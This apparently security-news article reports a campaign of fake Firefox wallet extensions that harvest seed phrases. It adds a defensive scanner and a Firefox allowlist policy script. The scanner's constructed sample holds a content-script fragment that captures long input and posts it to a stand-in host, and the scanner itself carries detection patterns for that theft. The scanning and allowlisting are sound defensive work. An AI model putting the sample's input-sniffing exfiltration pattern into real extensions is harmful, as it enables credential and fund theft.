Over 40 Malicious Add-ons Discovered Stealing Digital Assets
A major cybersecurity threat has emerged for cryptocurrency users: over 40 fake Firefox browser extensions have been discovered impersonating popular crypto wallets, with the intent to steal sensitive wallet credentials and digital assets. This sophisticated campaign, active since at least April 2025, has exposed thousands of users to the risk of losing their cryptocurrencies, highlighting the evolving tactics of cybercriminals in the Web3 era.
How the Scam Works: Anatomy of a Malicious Extension
The fraudulent extensions are not simple lookalikes. They are cleverly engineered clones of legitimate, open-source wallet add-ons, such as those for Coinbase, MetaMask, Trust Wallet, Phantom, Exodus, OKX, Keplr, MyMonero, Bitget, Leap, Ethereum Wallet, and Filfox. By copying the real codebase and injecting malicious logic, attackers ensure the extensions function as expected, making detection difficult for both users and security tools.
Key features of the scam include:
- Impersonation of Trusted Brands: The fake extensions use identical names, logos, and branding as the real wallets, making them nearly indistinguishable at first glance.
- Malicious Code Injection: Attackers add event listeners to monitor input fields for data exceeding 30 characters—typical of wallet seed phrases or private keys. When such data is detected, it is silently transmitted to attacker-controlled servers.
- Obfuscation Tactics: The extensions hide error dialogs and warnings by setting their opacity to zero, ensuring users remain unaware of any suspicious activity.
- Fake Reviews and Ratings: Hundreds of five-star reviews, far exceeding the number of actual installations, are posted to create an illusion of legitimacy and popularity. This social proof lures unsuspecting users into trusting and installing the extensions.
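The behaviours listed above map directly onto static indicators that a store reviewer or an internal extension scanner can look for before an add-on is trusted. The following is an added example, not Koi Security's or Mozilla's tooling: a small Node.js triage script that scores an unpacked extension's manifest and scripts against those indicators (input listeners paired with a length threshold, hard-coded exfiltration URLs, opacity-zero hiding, and over-broad permissions). The regexes, weights, verdict thresholds and the two sample packages are this example's own constructions.

```javascript
// Added example (not Koi Security's or Mozilla's tooling): a static triage
// pass over an unpacked browser extension that flags the indicators the
// article describes. Regex patterns, weights and verdict thresholds are this
// example's own heuristics; the sample packages below are constructed.

const INDICATORS = [
  {
    id: "input-length-sniff",
    weight: 3,
    // keystroke/input listener combined with a two-digit length threshold
    // (the campaign reportedly watched for values longer than 30 characters)
    test: (src) =>
      /addEventListener\(\s*["'](input|keyup|keydown|change|paste)["']/.test(src) &&
      /\.length\s*>=?\s*[2-9]\d\b/.test(src),
  },
  {
    id: "hardcoded-exfil",
    weight: 3,
    // fetch / sendBeacon with a literal http(s) URL, or an XMLHttpRequest
    // open() whose URL argument is a literal http(s) URL
    test: (src) =>
      /(fetch|sendBeacon)\s*\(\s*["'`]https?:\/\/|\.open\s*\(\s*["'][A-Z]+["']\s*,\s*["'`]https?:\/\//.test(src),
  },
  {
    id: "opacity-zero-hide",
    weight: 2,
    // an element hidden by forcing opacity to 0 (the dialog-hiding trick);
    // the lookahead keeps values such as 0.5 from matching
    test: (src) => /opacity\s*[:=]\s*["']?0(?:\.0+)?(?![\d.])/.test(src),
  },
];

// Manifest checks covering the "unusual permissions" advice: broad host
// access plus request interception is a strong signal when a wallet add-on
// should only need its own sites.
function scanManifest(manifest) {
  const perms = [...(manifest.permissions || []), ...(manifest.host_permissions || [])];
  const findings = [];
  if (perms.includes("<all_urls>")) findings.push({ id: "all-urls-permission", weight: 2 });
  if (perms.includes("webRequest") || perms.includes("webRequestBlocking"))
    findings.push({ id: "webrequest-permission", weight: 1 });
  return findings;
}

function scanSource(src) {
  return INDICATORS.filter((i) => i.test(src)).map(({ id, weight }) => ({ id, weight }));
}

// pkg = { manifest: <parsed manifest.json>, scripts: { "file.js": "<source>" } }
function triage(pkg) {
  const findings = scanManifest(pkg.manifest);
  for (const [file, src] of Object.entries(pkg.scripts)) {
    for (const f of scanSource(src)) findings.push({ ...f, file });
  }
  const score = findings.reduce((sum, f) => sum + f.weight, 0);
  const verdict = score >= 6 ? "block-and-review" : score >= 3 ? "manual-review" : "low-risk";
  return { score, verdict, findings };
}

// Constructed sample 1: the pattern the article describes, reduced to the
// fragments the scanner keys on (payload handling deliberately elided).
const SUSPICIOUS_PACKAGE = {
  manifest: { permissions: ["storage", "webRequest"], host_permissions: ["<all_urls>"] },
  scripts: {
    "content.js": `
document.addEventListener("input", (e) => {
  if (e.target.value.length > 30) {
    fetch("https://collector.example/c", { method: "POST" /* payload elided */ });
  }
});
document.querySelector(".error-dialog").style.opacity = "0";
`,
  },
};

// Constructed sample 2: an ordinary popup script with narrow permissions.
const BENIGN_PACKAGE = {
  manifest: { permissions: ["storage"], host_permissions: ["https://api.wallet.example/*"] },
  scripts: {
    "popup.js": `
document.getElementById("send").addEventListener("click", () => {
  const addr = document.getElementById("to").value.trim();
  if (addr.length === 0) showError("Recipient address required");
});
`,
  },
};

console.log(JSON.stringify(triage(SUSPICIOUS_PACKAGE), null, 2));
console.log(JSON.stringify(triage(BENIGN_PACKAGE), null, 2));
```

Run it with `node triage.js` after pointing `scripts` at the real files read from an unpacked `.xpi`. The scanner is deliberately coarse: a legitimate wallet can also have a long-input check or an https call, so a "manual-review" verdict is a prompt for a human to read the code, not a conviction. The combination that matters, as the article describes it, is an input listener with a length threshold next to a network send to a fixed host.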
The Scope and Impact of the Campaign
Cybersecurity researchers from Koi Security, who first uncovered the campaign, report that the operation is ongoing and evolving. New malicious extensions are uploaded to the Firefox Add-ons store regularly, with the most recent additions appearing just last week. The persistent nature of the uploads suggests a well-organized and determined threat actor.
The impact of this campaign is significant:
- Credential Theft: Once installed, the fake extensions extract wallet credentials directly from targeted websites and exfiltrate them to remote servers. This includes seed phrases, private keys, and other sensitive data.
- Financial Losses: With access to a user’s seed phrase, attackers can drain all assets from the wallet in a single, irreversible transaction.
- User Trust Erosion: The campaign undermines trust in browser extensions and the broader crypto ecosystem, making users more hesitant to adopt new tools.
Who Is Behind the Attack?
While attribution remains tentative, several indicators point to a Russian-speaking cybercriminal group. Researchers found Russian-language comments in the code and metadata in files hosted on the attackers’ servers. Although not conclusive, these artifacts suggest the campaign may originate from a Russian-speaking threat actor.
Why Firefox? The Browser’s Role in the Attack
Mozilla Firefox, known for its open-source ethos and robust add-ons ecosystem, has become an attractive target for cybercriminals. The official Firefox Add-ons store, while curated, is not immune to sophisticated scams. Attackers exploit the trust users place in the platform, leveraging the open-source nature of many wallet extensions to clone and modify them with malicious intent.
Mozilla has responded by developing early detection systems for crypto scam extensions, relying on automated risk indicators and human review. However, the sheer volume and sophistication of the fake extensions have allowed some to slip through the cracks, remaining available for download even after being reported.
Real-World Consequences: Stories from the Crypto Community
The fallout from this campaign is not just theoretical. Users have reported losing access to their wallets and funds after installing what they believed were legitimate extensions. In some cases, victims left one-star reviews warning others of the scam, but these are often drowned out by the flood of fake positive feedback.
One user recounted installing a wallet extension with hundreds of five-star reviews, only to have their entire crypto balance stolen within hours. Another described how the extension functioned perfectly, providing no indication that anything was amiss until it was too late.
How to Protect Yourself: Best Practices for Crypto Security
With the rise of sophisticated browser-based attacks, crypto users must adopt a more vigilant approach to security. Here are essential steps to safeguard your digital assets:
- Install Extensions Only from Verified Publishers: Always check the publisher’s credentials and cross-reference with official wallet websites before installing any browser add-on.
- Scrutinize Reviews and Ratings: Be wary of extensions with disproportionately high numbers of five-star reviews, especially if the number of installations is low.
- Monitor for Unexpected Behavior: If an extension requests unusual permissions or behaves differently after an update, uninstall it immediately and scan your system for malware.
- Use Allowlists: Limit browser extensions to a pre-approved list of trusted tools, especially on devices used for managing cryptocurrency.
- Regularly Update Software: Keep your browser and all extensions up to date to benefit from the latest security patches and threat intelligence.
- Backup Seed Phrases Offline: Never enter your seed phrase or private key into a browser extension unless you are certain of its authenticity. Store backups offline in secure locations.
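One way to enforce the allowlist advice on managed machines is Firefox's enterprise policy file. The script below is an added example, not Mozilla's or any wallet vendor's code: it generates a `policies.json` whose `ExtensionSettings` block every add-on except an approved set, and audits a list of installed add-ons against that policy, flagging entries that reuse an approved name under a different ID. The policy keys (`ExtensionSettings`, `installation_mode`, `install_url`, `blocked_install_message`) are Firefox's documented policy keys; the extension IDs, names, install URLs and the installed-add-on list are constructed placeholders.

```javascript
// Added example (not Mozilla's own code): build a Firefox policies.json that
// blocks every add-on except an approved list, then audit installed add-ons
// against it. ExtensionSettings keys are the documented Firefox policy keys;
// the IDs, names and URLs below are placeholders, not real wallet add-ons.

const APPROVED = [
  { id: "wallet-a@example.com", name: "Wallet A", installUrl: "https://downloads.example/wallet-a.xpi" },
  { id: "wallet-b@example.org", name: "Wallet B", installUrl: "https://downloads.example/wallet-b.xpi" },
];

// Produce the policies.json object: "*" blocked by default, each approved
// add-on force-installed from an https URL you control or trust.
function buildPolicy(approved, message) {
  const settings = {
    "*": { installation_mode: "blocked", blocked_install_message: message },
  };
  for (const ext of approved) {
    if (!/^https:\/\//.test(ext.installUrl)) {
      throw new Error(`install_url for ${ext.id} must be https`);
    }
    settings[ext.id] = { installation_mode: "force_installed", install_url: ext.installUrl };
  }
  return { policies: { ExtensionSettings: settings } };
}

// Return installed add-ons the policy does not permit. An entry whose name
// matches an approved add-on but whose id does not is marked as a lookalike,
// the shape of the clones the article describes.
function auditInstalled(installed, policy, approved) {
  const settings = policy.policies.ExtensionSettings;
  const blockedByDefault = (settings["*"] || {}).installation_mode === "blocked";
  const approvedNames = new Set(approved.map((a) => a.name.toLowerCase()));
  return installed
    .filter((ext) => {
      const entry = settings[ext.id];
      return entry ? entry.installation_mode === "blocked" : blockedByDefault;
    })
    .map((ext) => ({ ...ext, lookalike: approvedNames.has(ext.name.toLowerCase()) }));
}

// Constructed inventory, e.g. exported from about:support on a managed host.
const INSTALLED = [
  { id: "wallet-a@example.com", name: "Wallet A" },                       // approved
  { id: "{1b2c3d4e-0000-4000-8000-000000000001}", name: "Wallet A" },     // same brand, unknown id
  { id: "notes@example.net", name: "Sticky Notes" },                      // unrelated, not allowlisted
];

const POLICY = buildPolicy(APPROVED, "Only allowlisted wallet extensions may be installed on this device.");
console.log(JSON.stringify(POLICY, null, 2));
console.log(auditInstalled(INSTALLED, POLICY, APPROVED));
```

Write the generated object to `distribution/policies.json` inside the Firefox installation directory (or deliver it through the equivalent Windows registry or macOS profile mechanism) and Firefox will refuse new installs outside the list. The audit function is the companion check for machines that were provisioned before the policy existed: a second "Wallet A" with an unfamiliar ID is exactly the case to remove and investigate.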
The Broader Implications for Web3 and Crypto Adoption
This campaign underscores the growing pains of the rapidly expanding Web3 ecosystem. As more users enter the world of decentralized finance and digital assets, the attack surface for cybercriminals widens. The open-source nature of many crypto tools, while fostering innovation, also provides opportunities for malicious actors to exploit code transparency.
For the industry, this incident is a wake-up call. Wallet providers, browser developers, and security researchers must collaborate to develop more robust vetting processes, automated detection tools, and user education initiatives. The goal is to strike a balance between openness and security, ensuring that innovation does not come at the expense of user safety.
Mozilla’s Response and Ongoing Efforts
Mozilla, the organization behind Firefox, has acknowledged the threat and is actively working to remove malicious extensions from its store. The company has implemented improved tooling and processes to identify and take down scam add-ons quickly. According to Mozilla, many of the extensions identified by Koi Security had already been removed before the public disclosure, and the review team continues to monitor for new threats.
Despite these efforts, the persistence of the attackers means that some malicious extensions remain available. Mozilla urges users to report suspicious add-ons and to follow best practices for extension security.
What This Means for the Future of Crypto Security
The discovery of over 40 fake Firefox extensions targeting crypto wallets is a stark reminder that the battle between cybercriminals and security professionals is ongoing. As attackers become more sophisticated, users must remain vigilant and proactive in protecting their digital assets.
For those involved in cryptocurrency, whether as investors, developers, or enthusiasts, the message is clear: treat browser extensions with the same caution as any other software. Verify sources, question authenticity, and never let convenience override security.
The crypto community’s resilience will be tested by such threats, but with increased awareness and collective action, users can continue to benefit from the promise of decentralized finance while minimizing the risks posed by malicious actors.